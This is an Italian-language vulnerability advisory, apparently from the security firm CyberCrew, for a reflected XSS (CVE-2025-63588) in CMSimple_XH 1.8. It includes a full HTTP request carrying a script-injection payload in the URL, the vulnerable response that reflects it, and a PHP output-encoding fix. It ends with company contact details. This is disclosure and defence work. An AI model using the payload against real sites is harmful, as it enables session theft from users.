
Proof-of-concept dettagliato per CVE-2025-63588, una vulnerabilità XSS riflessa in CMSimple_XH 1.8, con punteggio CVSS, analisi dell'impatto ed esempio di remediation di codifica sicura.
CVSS v3.1 stimato: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medio)
CVE assegnato: CVE-2025-63588
Prodotti: CMSimple_XH - 1.8
Fornitore: CMSimple_XH - https://www.cmsimple-xh.org/
Esiste una vulnerabilità di Cross-Site Scripting (XSS) riflesso nel codice di parsing del front-router di CMSimple_XH che gestisce input dinamici relativi al login. L'applicazione riflette i dati controllati dall'attaccante presi dall'URI della richiesta direttamente nell'HTML generato (ad esempio negli attributi action dei form e negli href degli anchor) senza una corretta codifica dell'output. Un attaccante può creare un URL che, se visitato da una vittima, causa l'esecuzione di JavaScript arbitrario nel browser della vittima nel contesto del sito vulnerabile.
Si tratta di un XSS riflesso (non persistente); lo sfruttamento richiede che una vittima segua un link appositamente creato. Il fornitore è stato informato e il problema è stato documentato e gli è stato assegnato il CVE sopra indicato.
HttpOnly, i token di sessione possono essere rubati.La vulnerabilità deriva dal codice del front-router / index.php (o controller front-end equivalente) che analizza i segmenti di percorso dinamici e li mappa in variabili di pagina/template. I frammenti di percorso grezzi (il frammento di stile ?Templates... utilizzato dal router di CMSimple_XH) vengono passati ai template delle pagine e iniettati negli attributi HTML senza una codifica o sanificazione appropriata degli attributi HTML, consentendo l'iniezione di tag <script> o altri payload che vengono renderizzati così come sono. Problemi simili di XSS riflesso sono stati pubblicati per altri componenti web e sono comunemente causati da una codifica errata dell'output di input non fidati.
Questo PoC dimostra il riflesso dell'input fornito dall'attaccante nell'HTML restituito, che verrà eseguito nel browser della vittima.
Richiesta:
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45
login=true&keycut=z9U%21q2k%21F0&submit=Login
Risposta:
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="https://github.com/cybercrewinc/cve-2025-63588/blob/main/cmsimplexh?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
Quando il browser della vittima renderizza questa pagina, lo <script>alert(1)</script> iniettato viene eseguito.

$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';
Per domande o richieste, non esitate a contattarci.

📞 Tel: 03-6853-5823
📧 Mail: [email protected]
| Voce | Contenuto |
|---|---|
| Nome azienda | CyberCrew Co., Ltd. |
| Sede | 6° piano, Akihabara Dai Building, 1-18-13 Sotokanda, Chiyoda-ku, Tokyo |
Analizziamo le vulnerabilità dell'organizzazione da più prospettive e proponiamo le migliori contromisure.
Copriamo test mirati, basati su scenari e LLM pentest.
Rileviamo tempestivamente la fuga di informazioni sensibili e interveniamo rapidamente.
Eseguiamo valutazioni della capacità difensiva basate su scenari di attacco realistici.
Supportiamo la progettazione con considerazioni sulla sicurezza fin dalle fasi iniziali dello sviluppo.
🌐 Sito ufficiale: https://www.cybercrew.co.jp
🕒 CyberCrew — Il tuo partner di fiducia per la sicurezza.